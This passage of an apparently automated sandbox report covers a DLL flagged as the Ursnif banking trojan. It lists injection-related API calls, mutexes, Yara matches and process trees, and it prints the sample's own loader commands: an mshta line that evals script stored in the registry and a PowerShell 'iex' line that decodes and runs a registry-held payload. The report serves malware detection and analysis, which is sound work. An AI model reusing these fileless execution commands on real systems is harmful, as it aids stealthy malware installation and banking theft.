            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00448DAA NtQueryKey,NtQueryKey,lstrlenW,NtQueryKey,lstrcpyW,0_2_00448DAA
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00446F11 NtQuerySystemInformation,RtlNtStatusToDosError,0_2_00446F11
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB387C NtCreateSection,35_2_00FB387C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB3830 NtWriteVirtualMemory,35_2_00FB3830
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB1AC4 NtQueryInformationProcess,35_2_00FB1AC4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FABAB4 NtAllocateVirtualMemory,35_2_00FABAB4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FACCA0 NtReadVirtualMemory,35_2_00FACCA0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCADD4 NtQueryInformationProcess,35_2_00FCADD4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBF560 NtSetInformationProcess,CreateRemoteThread,TerminateThread,35_2_00FBF560
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCF7EC NtQueryInformationToken,NtQueryInformationToken,NtClose,35_2_00FCF7EC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBFFCC NtMapViewOfSection,35_2_00FBFFCC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC676C NtSetContextThread,NtUnmapViewOfSection,NtClose,35_2_00FC676C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FE1002 NtProtectVirtualMemory,NtProtectVirtualMemory,35_2_00FE1002
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00442F65 CreateProcessAsUserW,0_2_00442F65
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_004321610_3_00432161
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00431AE40_3_00431AE4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_737522A40_2_737522A4
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0047181A0_2_0047181A
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045F9C90_2_0045F9C9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004491D80_2_004491D8
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044A2350_2_0044A235
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004562B90_2_004562B9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00447CF00_2_00447CF0
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_004514810_2_00451481
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045C53B0_2_0045C53B
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045BDD50_2_0045BDD5
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0044DE6E0_2_0044DE6E
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00459F480_2_00459F48
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00466F280_2_00466F28
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCC16435_2_00FCC164
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCA4BC35_2_00FCA4BC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC676C35_2_00FC676C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC20F835_2_00FC20F8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCE08035_2_00FCE080
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC606435_2_00FC6064
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBB04035_2_00FBB040
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA203C35_2_00FA203C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC003435_2_00FC0034
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC91A035_2_00FC91A0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB117435_2_00FB1174
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCF94035_2_00FCF940
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB913835_2_00FB9138
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAC13435_2_00FAC134
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC822435_2_00FC8224
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC320835_2_00FC3208
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA2BC835_2_00FA2BC8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB938035_2_00FB9380
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA8B5C35_2_00FA8B5C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB8B4C35_2_00FB8B4C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA732035_2_00FA7320
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FABCF835_2_00FABCF8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB3CE035_2_00FB3CE0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC74CC35_2_00FC74CC
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB0CC035_2_00FB0CC0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC94B835_2_00FC94B8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB9CB035_2_00FB9CB0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBD4A835_2_00FBD4A8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAD46035_2_00FAD460
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB1D9435_2_00FB1D94
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB452C35_2_00FB452C
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBB52035_2_00FBB520
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCB51635_2_00FCB516
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA6D0835_2_00FA6D08
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FC26B435_2_00FC26B4
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCBEB035_2_00FCBEB0
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAAE0435_2_00FAAE04
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA37B835_2_00FA37B8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FB17B835_2_00FB17B8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FCAFB835_2_00FCAFB8
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA9F9835_2_00FA9F98
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FBF77035_2_00FBF770
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FAB75C35_2_00FAB75C
            Source: jery0dbp.dll.31.drStatic PE information: No import functions for PE file found
            Source: 1453igkk.dll.29.drStatic PE information: No import functions for PE file found
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
            Source: C:\Windows\System32\loaddll32.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: classification engineClassification label: mal100.bank.troj.evad.winDLL@25/54@4/2
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00443861 CloseHandle,CloseHandle,CreateToolhelp32Snapshot,GetModuleHandleA,GetProcAddress,Thread32First,OpenThread,QueueUserAPC,CloseHandle,Thread32Next,CloseHandle,0_2_00443861
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\HighJump to behavior
            Source: C:\Windows\System32\loaddll32.exeMutant created: \Sessions\1\BaseNamedObjects\{D2ACCE85-0966-D4B7-2326-4D4807BAD1FC}
            Source: C:\Windows\System32\control.exeMutant created: \Sessions\1\BaseNamedObjects\{C659AAB4-6D66-E894-275A-F19C4B2EB590}
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\{AABE5E0C-015E-6C1F-DB7E-C5603F92C994}
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1364:120:WilError_01
            Source: C:\Program Files\internet explorer\iexplore.exeFile created: C:\Users\user\AppData\Local\Temp\~DF9DD6CD76C3034B75.TMPJump to behavior
            Source: onerous.tar.dllStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
            Source: C:\Program Files\internet explorer\iexplore.exeFile read: C:\Users\desktop.iniJump to behavior
            Source: C:\Windows\System32\loaddll32.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: onerous.tar.dllVirustotal: Detection: 47%
            Source: onerous.tar.dllReversingLabs: Detection: 58%
            Source: loaddll32.exeString found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
            Source: unknownProcess created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\onerous.tar.dll'
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2
            Source: unknownProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2
            Source: unknownProcess created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: unknownProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
            Source: C:\Windows\System32\loaddll32.exeProcess created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -hJump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:7128 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17410 /prefetch:2Jump to behavior
            Source: C:\Program Files\internet explorer\iexplore.exeProcess created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:6188 CREDAT:17422 /prefetch:2Jump to behavior
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES8664.tmp' 'c:\Users\user\AppData\Local\Temp\1453igkk\CSCD2500265572748DEA3D91E508E5342FB.TMP'
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES9384.tmp' 'c:\Users\user\AppData\Local\Temp\jery0dbp\CSCF9697DD756E45B2A9442C531AA1339A.TMP'
            Source: C:\Windows\explorer.exeProcess created: unknown unknown
            Source: C:\Windows\System32\control.exeProcess created: unknown unknown
            Source: C:\Windows\System32\loaddll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32Jump to behavior
            Source: C:\Windows\System32\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\SettingsJump to behavior
            Source: Window RecorderWindow detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Program Files (x86)\Internet Explorer\iexplore.exeFile opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dllJump to behavior
            Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 0000001D.00000002.386299480.000001E454AC0000.00000002.00000001.sdmp, csc.exe, 0000001F.00000002.393531014.00000252540B0000.00000002.00000001.sdmp
            Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp
            Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
            Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.415714713.0000000003CB0000.00000004.00000001.sdmp
            Source: Binary string: rundll32.pdb source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
            Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000023.00000002.853520403.0000011AB5EFC000.00000004.00000040.sdmp
            Source: Binary string: wscui.pdb source: explorer.exe, 00000021.00000000.419495415.000000000E9C0000.00000002.00000001.sdmp

            Data Obfuscation:

            barindex
            Suspicious powershell command line foundShow sources
            Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))Jump to behavior
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'
            Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.cmdline'Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.cmdline'Jump to behavior
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0045735C LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0045735C
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043AE32 push eax; iretd 0_3_0043AE33
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043AE34 push esi; iretd 0_3_0043AE35
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00431AD3 push ecx; ret 0_3_00431AE3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_00431A80 push ecx; ret 0_3_00431A89
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_3_0043AF92 push edx; iretd 0_3_0043AF93
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73752240 push ecx; ret 0_2_73752249
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_73752293 push ecx; ret 0_2_737522A3
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0046B834 push cs; ret 0_2_0046B841
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_0046BA9E push esp; ret 0_2_0046BAA1
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00466BB0 push ecx; ret 0_2_00466BB9
            Source: C:\Windows\System32\loaddll32.exeCode function: 0_2_00466F17 push ecx; ret 0_2_00466F27
            Source: C:\Windows\System32\control.exeCode function: 35_2_00FA4DCD push 3B000001h; retf 35_2_00FA4DD2
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\jery0dbp\jery0dbp.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\1453igkk\1453igkk.dllJump to dropped file

            Hooking and other Techniques for Hiding and Protection:

            barindex
            Yara detected UrsnifShow sources
            Source: Yara matchFile source: 0000001A.00000003.397434238.000002A5846A0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242195768.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242321431.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242337914.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000002.853077488.0000000000FDE000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.426105865.0000000000440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000023.00000003.416323968.0000011AB4010000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.409185391.0000000000560000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242277638.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242347487.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.350560370.0000000002F8B000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242303966.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242243405.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000003.242219094.0000000003108000.00000004.00000040.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5556, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: control.exe PID: 4672, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: loaddll32.exe PID: 6780, type: MEMORY
            Source: C:\Windows\System32\loaddll32.exeRegistry key monitored for changes: HKEY_CURRENT_USER_ClassesJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\loaddll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
